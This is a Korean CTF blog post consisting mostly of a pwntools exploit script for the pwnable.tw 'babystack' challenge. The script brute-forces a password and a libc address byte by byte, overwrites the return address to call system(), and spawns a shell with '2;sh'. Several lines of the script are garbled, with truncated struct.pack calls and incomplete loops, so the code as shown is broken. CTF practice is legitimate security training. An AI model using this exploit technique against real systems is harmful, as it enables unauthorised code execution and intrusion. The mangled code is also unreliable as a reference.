cdor1's lab
pwnable.tw babystack 본문
from pwn import *
#s = remote('chall.pwnable.tw', 10205)
s = process('./babystack',env={'LD_PRELOAD':'./libc_64.so.6'})
password = ''
libc_leak = ''
def input_passwd(passwd):
s.recvuntil('>> ')
s.sendline('1')
s.recvuntil('Your passowrd :')
s.send(passwd)
return s.recvuntil('!')
def cp(data):
s.recvuntil('>> ')
s.sendline('3')
s.recvuntil(' :')
s.send(data)
for i in range(0, 16):
for j in range(1, 0x100):
b = input_passwd(password + struct.pack('> ')
s.sendline('1')
break
input_passwd((password + '\x00').ljust(0x48, 'a'))
cp('b'*24)
s.sendline('1')
for a in range(0, 6):
for c in range(1, 0x100):
b = input_passwd('a'*8 + libc_leak + struct.pack('> ')
s.sendline('1')
break
libc_leak = u64(libc_leak + '\x00\x00')
libc_base = libc_leak - 0x78439
system = libc_base + 0x45390
log.info('libc_leak : ' + hex(libc_leak))
log.info('libc_base : ' + hex(libc_base))
log.info('system : ' + hex(system))
payload = p64(0)
payload += 'c'*0x38
payload += password
payload += 'd'*0x18
payload += p64(system)
input_passwd(payload)
cp('A'*8)
s.sendline('2;sh\x00')
#make padding
#cover return addr
#2;/bin/sh\x00
s.interactive() 스택 피보팅 해주면서 strncmp로 패스워드와 libc leak. strcpy이후 피보팅되어서 select가르키니까 rdi에 2;sh\x00들어가고 get shell
'Security > Pwnable' 카테고리의 다른 글
| pwnable.tw Secret Of My Heart (0) | 2017.09.12 |
|---|---|
| pwnable.tw SecretGarden (0) | 2017.09.01 |
| WHL_Cykor - Cylogger (0) | 2017.08.30 |
| pwnable.tw unexploitable (0) | 2017.08.11 |
| pwnable.tw spirited_away (0) | 2017.08.11 |
Comments